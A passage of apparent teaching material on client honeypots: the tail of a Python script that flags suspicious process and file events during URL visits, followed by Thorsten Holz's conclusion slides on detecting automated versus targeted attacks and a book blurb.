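                v["end"], v["result"] = t, state
                visits.append(v)
    return visits


def parse_events(text):
    """Parse file/process events; timestamps carry milliseconds in this log."""
    events = []
    for row in csv.reader(io.StringIO(text)):
        if len(row) != 5:
            continue
        kind, ts, actor, action, target = row
        t = datetime.strptime(ts.strip(), "%d/%m/%Y %H:%M:%S.%f")
        events.append({"kind": kind, "time": t, "actor": actor, "action": action, "target": target})
    return events


def is_suspicious(ev):
    """A new process is always an anomaly; a file write is one unless it hits the allow-list."""
    if ev["kind"] == "process":
        return True
    if ev["kind"] == "file" and ev["action"].lower() == "write":
        return not ev["target"].startswith(ALLOWED_WRITE_PREFIXES)
    return False


def classify(visit_text, event_text):
    """Attribute anomalous events to the visit whose time window contains them."""
    events = parse_events(event_text)
    report = {}
    for v in parse_visits(visit_text):
        hits = [e for e in events if v["start"] <= e["time"] <= v["end"] and is_suspicious(e)]
        report[v["url"]] = {
            "result": v["result"],
            "malicious": bool(hits),
            "indicators": ["%s %s %s" % (e["kind"], e["action"], e["target"]) for e in hits],
        }
    return report


if __name__ == "__main__":
    for url, verdict in classify(VISIT_LOG, EVENT_LOG).items():
        print(url, verdict)
```

Attribution by time window is the weak point of this approach: with visits back to back, an event that lands after the 'visited' line of one URL and before the 'visiting' line of the next belongs to nobody, which is why Capture-HPC style clients revert the VM between visits and keep the windows short.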




Conclusion

• Current honeypots are good at finding known attacks / automated attacks

  • We can detect worms, botnets, and other automated threats

• Finding “0-day” / targeted attacks is harder

  • Why should an attacker waste his 0-day on my honeypot?

  • How to trick a clever attacker?
Thorsten Holz
http://pi1.informatik.uni-mannheim.de/
thorsten.holz@informatik.uni-mannheim.de

More information: http://honeyblog.org

“Virtual Honeypots is the best reference for honeypots today. Security experts Niels Provos and Thorsten Holz cover a large breadth of cutting-edge topics, from low-interaction honeypots to botnets and malware. If you want to learn about the latest types of honeypots, how they work and what they can do for you, this is the resource you need.”

— Lance Spitzner, Founder, Honeynet Project